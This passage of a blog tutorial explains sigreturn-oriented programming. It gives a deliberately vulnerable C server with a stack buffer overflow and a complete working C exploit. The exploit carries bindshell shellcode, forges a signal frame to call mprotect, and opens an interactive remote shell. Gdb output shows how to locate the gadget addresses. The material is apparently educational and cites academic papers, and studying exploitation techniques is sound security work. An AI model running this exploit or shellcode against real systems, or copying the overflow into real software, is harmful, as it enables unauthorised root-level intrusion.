structure. After sigreturn, execve will be called as rip points now to syscall
gadget and rax holds the syscall number of execve. In our example, execve will
start /bin/sh shell.</p>
<h2 id="code">Code</h2>
<p>In this section we provide a vulnerable server
(<a href="https://github.com/mtalbi/write-up/blob/master/srop/vuln.c">vuln.c</a>) and use
the SROP techniqpue to exploit it
(<a href="https://github.com/mtalbi/write-up/blob/master/srop/exploit.c">exploit.c</a>).</p>
<h3 id="vulnerable-server">Vulnerable server</h3>
<p>The following program is a simple server that replies back with a welcoming
message after receiving some data from client. The vulnerability is present in
the handle_conn function where we can read more data from client (4096 bytes)
than the destination array (input) can hold (1024 bytes). The program is
therefore vulnerable to a classical stack-based overflow.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
</span>
<span class="cp">#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
</span>
<span class="cp">#define PAGE_SIZE 0x1000
#define PORT 7777
</span>
<span class="c1">// in .bss</span>
<span class="kt">char</span> <span class="n">data</span><span class="p">[</span><span class="n">PAGE_SIZE</span> <span class="o">*</span> <span class="mi">2</span><span class="p">];</span>
<span class="kt">void</span> <span class="nf">init</span><span class="p">();</span>
<span class="kt">void</span> <span class="nf">handle_error</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">);</span>
<span class="kt">int</span> <span class="nf">handle_conn</span><span class="p">(</span><span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="nf">welcome</span><span class="p">(</span><span class="kt">int</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">init</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sa</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">s</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">k</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">PORT</span><span class="p">);</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">INADDR_ANY</span><span class="p">;</span>
<span class="n">size</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span><span class="p">);</span>
<span class="k">if</span><span class="p">((</span><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"socket failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="n">setsockopt</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">SOL_SOCKET</span><span class="p">,</span> <span class="n">SO_REUSEADDR</span><span class="p">,</span> <span class="o">&</span><span class="n">k</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">int</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"setsockopt failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="n">bind</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sa</span><span class="p">,</span> <span class="n">size</span><span class="p">))</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"bind failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="n">listen</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"listen failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span><span class="p">((</span><span class="n">c</span> <span class="o">=</span> <span class="n">accept</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">))</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"accept failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">handle_conn</span><span class="p">(</span><span class="n">c</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">handle_conn</span><span class="p">(</span><span class="kt">int</span> <span class="n">c</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">input</span><span class="p">[</span><span class="mh">0x400</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">amt</span><span class="p">;</span>
<span class="c1">//too large data !!!</span>
<span class="k">if</span><span class="p">((</span><span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="n">input</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">)</span> <span class="o"><</span> <span class="mi">0</span><span class="p">))</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"receive failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">input</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">);</span>
<span class="n">welcome</span><span class="p">(</span><span class="n">c</span><span class="p">);</span>
<span class="n">close</span><span class="p">(</span><span class="n">c</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">welcome</span><span class="p">(</span><span class="kt">int</span> <span class="n">c</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">amt</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">msg</span> <span class="o">=</span> <span class="s">"I'm vulnerable program running with root priviledges!!</span><span class="se">\n</span><span class="s">Please do not exploit me"</span><span class="p">;</span>
<span class="n">write</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="n">msg</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">msg</span><span class="p">));</span>
<span class="k">if</span><span class="p">((</span><span class="n">amt</span> <span class="o">=</span> <span class="n">write</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">data</span><span class="p">)))</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"send failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">handle_error</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">msg</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">perror</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">gadget</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">asm</span><span class="p">(</span><span class="s">"mov $0xf,%rax</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">asm</span><span class="p">(</span><span class="s">"retq</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">init</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<h3 id="exploit">Exploit</h3>
<p>We know that our payload will be copied in a fixed location in .bss. (at
0x6012c0). Our strategy is to copy a shellcode there and then call mprotect
syscall in order to change page protection starting at 0x601000 (must be a
multiple ot the page size).</p>
<p><img src="/images/srop_bss.png" alt="" class="center" />
<em>Figure 2: Payload copied in .bss</em></p>
<p>In this exploit, we overflow our vulnerable buffer as shown by figure 3. First,
we fill our buffer with a nop sled (not necessary) followed by a classical
bindshell. This executable payload is prepended with an address pointing to the
shellcode in .bss (see figure 2).</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/mman.h>
#include <errno.h>
</span>
<span class="cp">#define HOSTNAME "localhost"
#define PORT 7777
#define POWN 31337
#define SIZE 0x400 + 8*2
</span>
<span class="cp">#define SYSCALL_GADGET 0xffffffffff600007
#define RAX_15_GADGET 0x400ad3
#define DATA 0x6012c0
#define MPROTECT_BASE 0x601000 //must be a multiple of page_size (in .bss)
#define MPROTECT_SYSCALL 0xa
#define FLAGS 0x33
#define PAGE_SIZE 4096
</span>
<span class="cp">#define COLOR_SHELL "\033[31;01mbind-shell\033[00m > "
</span>
<span class="k">struct</span> <span class="n">payload_t</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">nopshell</span><span class="p">[</span><span class="n">SIZE</span><span class="p">];</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">gadget</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">sigret</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">ucontext</span> <span class="n">context</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">shellcode</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x5f\x6a\x3b\x58\x0f\x05</span><span class="s">"</span><span class="p">;</span>
<span class="kt">int</span> <span class="nf">setsock</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">hostname</span><span class="p">,</span> <span class="kt">int</span> <span class="n">port</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">session</span><span class="p">(</span><span class="kt">int</span> <span class="n">s</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">overflows</span><span class="p">(</span><span class="kt">int</span> <span class="n">s</span><span class="p">);</span>
<span class="kt">int</span> <span class="nf">handle_error</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">msg</span><span class="p">);</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">s</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[1] connecting to target ... </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">setsock</span><span class="p">(</span><span class="n">HOSTNAME</span><span class="p">,</span> <span class="n">PORT</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] connected </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[2] overflowing ... </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">overflows</span><span class="p">(</span><span class="n">s</span><span class="p">);</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">setsock</span><span class="p">(</span><span class="n">HOSTNAME</span><span class="p">,</span> <span class="n">POWN</span><span class="p">);</span>
<span class="n">session</span><span class="p">(</span><span class="n">s</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">overflows</span><span class="p">(</span><span class="kt">int</span> <span class="n">s</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">payload_t</span> <span class="n">payload</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">output</span><span class="p">[</span><span class="mh">0x400</span><span class="p">];</span>
<span class="n">memset</span><span class="p">(</span><span class="n">payload</span><span class="p">.</span><span class="n">nopshell</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">SIZE</span><span class="p">);</span>
<span class="n">strncpy</span><span class="p">(</span><span class="n">payload</span><span class="p">.</span><span class="n">nopshell</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">));</span>
<span class="n">payload</span><span class="p">.</span><span class="n">ret</span> <span class="o">=</span> <span class="n">DATA</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">;</span> <span class="c1">//precise address of nop sled</span>
<span class="n">payload</span><span class="p">.</span><span class="n">gadget</span> <span class="o">=</span> <span class="n">RAX_15_GADGET</span><span class="p">;</span>
<span class="n">payload</span><span class="p">.</span><span class="n">sigret</span> <span class="o">=</span> <span class="n">SYSCALL_GADGET</span><span class="p">;</span>
<span class="cm">/* initializing the context structure */</span>
<span class="n">bzero</span><span class="p">(</span><span class="o">&</span><span class="n">payload</span><span class="p">.</span><span class="n">context</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">ucontext</span><span class="p">));</span>
<span class="cm">/* setting first arg of mprotect in rdi */</span>
<span class="n">payload</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="n">MPROTECT_BASE</span><span class="p">;</span>
<span class="cm">/* setting second arg of mprotect in rsi */</span>
<span class="n">payload</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="cm">/* setting third arg of mprotect in rdx */</span>
<span class="n">payload</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span> <span class="o">|</span> <span class="n">PROT_EXEC</span><span class="p">;</span>
<span class="cm">/* setting mprotect syscall number in rax */</span>
<span class="n">payload</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">13</span><span class="p">]</span> <span class="o">=</span> <span class="n">MPROTECT_SYSCALL</span><span class="p">;</span>
<span class="cm">/*
* jumping into nop sled after mprotect syscall.
* setting rsp value
*/</span>
<span class="n">payload</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">15</span><span class="p">]</span> <span class="o">=</span> <span class="n">DATA</span><span class="p">;</span>
<span class="cm">/* setting rip value (points to syscall address) */</span>
<span class="n">payload</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="n">SYSCALL_GADGET</span><span class="p">;</span>
<span class="cm">/* cs = 0x33 */</span>
<span class="n">payload</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">18</span><span class="p">]</span> <span class="o">=</span> <span class="n">FLAGS</span><span class="p">;</span>
<span class="n">write</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="o">&</span><span class="n">payload</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">payload</span><span class="p">));</span>
<span class="n">read</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">output</span><span class="p">,</span> <span class="mh">0x400</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">setsock</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">hostname</span><span class="p">,</span> <span class="kt">int</span> <span class="n">port</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">sock</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">hostent</span> <span class="o">*</span><span class="n">hent</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sa</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">in_addr</span> <span class="n">ia</span><span class="p">;</span>
<span class="n">hent</span> <span class="o">=</span> <span class="n">gethostbyname</span><span class="p">(</span><span class="n">hostname</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">hent</span><span class="p">)</span> <span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">ia</span><span class="p">.</span><span class="n">s_addr</span><span class="p">,</span> <span class="n">hent</span><span class="o">-></span><span class="n">h_addr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span><span class="p">((</span><span class="n">ia</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="n">hostname</span><span class="p">))</span> <span class="o">==</span> <span class="n">INADDR_ANY</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"incorrect address !!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">((</span><span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"socket failed !!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">port</span><span class="p">);</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">ia</span><span class="p">.</span><span class="n">s_addr</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sa</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sa</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection failed !!!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">sock</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">session</span><span class="p">(</span><span class="kt">int</span> <span class="n">s</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">amt</span><span class="p">;</span>
<span class="n">fd_set</span> <span class="n">fds</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[!] enjoy your shell </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">COLOR_SHELL</span><span class="p">,</span> <span class="n">stderr</span><span class="p">);</span>
<span class="n">FD_ZERO</span><span class="p">(</span><span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">FD_SET</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="n">FD_SET</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="n">select</span><span class="p">(</span><span class="n">s</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">FD_ISSET</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">))</span> <span class="p">{</span>
<span class="k">if</span><span class="p">((</span><span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">1024</span><span class="p">))</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection lost</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">buf</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="n">write</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="n">FD_ISSET</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">))</span> <span class="p">{</span>
<span class="k">if</span><span class="p">((</span><span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">1024</span><span class="p">))</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection lost</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">buf</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">COLOR_SHELL</span><span class="p">,</span> <span class="n">stderr</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">handle_error</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">msg</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">perror</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Our goal is to change protection of memory page containing our shellcode. More
precisely, we want to make the following call so that we can execute our
shellcode:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">mmprotect</span><span class="p">(</span><span class="mh">0x601000</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span> <span class="o">|</span> <span class="n">PROT_EXEC</span><span class="p">);</span></code></pre></figure>
<p>Here, is what happens when the vulnerable function returns:</p>
<ol>
<li>The artificial gadget is executed. It sets rax register to 15.</li>
<li>Our artificial gadget is followed by a syscall gadget that will result in a sigreturn call.</li>
<li>The sigreturn uses our fake uc_mcontext structure to restore registers values. Only non shaded parameters in figure 3 are relevant to the exploit. After this call, rip points to syscall gadget, rax is set to mprotect syscall number, and rdi, rsi and rdx hold the parameters of mprotect function. Additionally, rsp points to our payload in .bss.</li>
<li>mprotect syscall is executed.</li>
<li>ret instruction of syscall gadget is executed. This instruction will set instruction pointer to the address popped from rsp. This address points to our shellcode (see figure 2).</li>
<li>The shellcode is executed.</li>
</ol>
<p><img src="/images/srop_exploit.png" alt="" width="270px" class="center" />
<em>Figure 3: Stack after overflowing input buffer</em></p>
<h3 id="replaying-the-exploit">Replaying the exploit</h3>
<p>The above code has been compiled using gcc (gcc -g -o vuln vuln.c) on a
Debian Wheezy running on x_86_64 arch. Before reproducing this exploit, you
need to adjust first the following addresses:</p>
<ul>
<li><strong>SYSCALL_GADGET</strong></li>
</ul>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="gp">mtalbi@mtalbi:/home/mtalbi/srop$</span><span class="w"> </span><span class="nb">cat</span> /proc/self/maps
<span class="c">...
</span><span class="go">7ffffe5ff000-7ffffe600000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
</span><span class="c">...
</span><span class="gp">gdb$</span><span class="w"> </span>x/3i 0xffffffffff600000
<span class="go"> 0xffffffffff600000: mov rax,0x60
0xffffffffff600007: syscall
0xffffffffff600009: ret</span></code></pre></figure>
<ul>
<li><strong>RAX_15_GADGET</strong></li>
</ul>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="gp">mtalbi@mtalbi:/home/mtalbi/srop$</span><span class="w"> </span>gdb server
<span class="go">(gdb) disas gadget
Dump of assembler code for function gadget:
</span><span class="gp"> 0x0000000000400acf <+0></span>: push %rbp
<span class="gp"> 0x0000000000400ad0 <+1></span>: mov %rsp,%rbp
<span class="gp"> 0x0000000000400ad3 <+4></span>: mov <span class="nv">$0xf</span>,%rax
<span class="gp"> 0x0000000000400ada <+11></span>: retq
<span class="gp"> 0x0000000000400adb <+12></span>: pop %rbp
<span class="gp"> 0x0000000000400adc <+13></span>: retq
<span class="go">End of assembler dump.</span></code></pre></figure>
<ul>
<li><strong>DATA</strong></li>
</ul>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="go">(gdb) p &data
</span><span class="gp">$</span>1 <span class="o">=</span> <span class="o">(</span>char <span class="o">(</span><span class="k">*</span><span class="o">)[</span>8192]<span class="o">)</span> 0x6012c0</code></pre></figure>
<h2 id="references">References</h2>
<ul>
<li>
<p><strong>[BB14]</strong> Erik Bosman and Herbert Bos. We got signal. a return to portable exploits. (working title, subject to change.). In Security & Privacy (Oakland), San Jose, CA, USA, May 2014. IEEE.</p>
</li>
<li>
<p><strong>[Sha07]</strong> Hovav Shacham. The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86). In Proceedings of the 14th ACM Conference on Computer and Communications Security, CCS ’07, pages 552– 561, New York, NY, USA, 2007. ACM.</p>
</li>
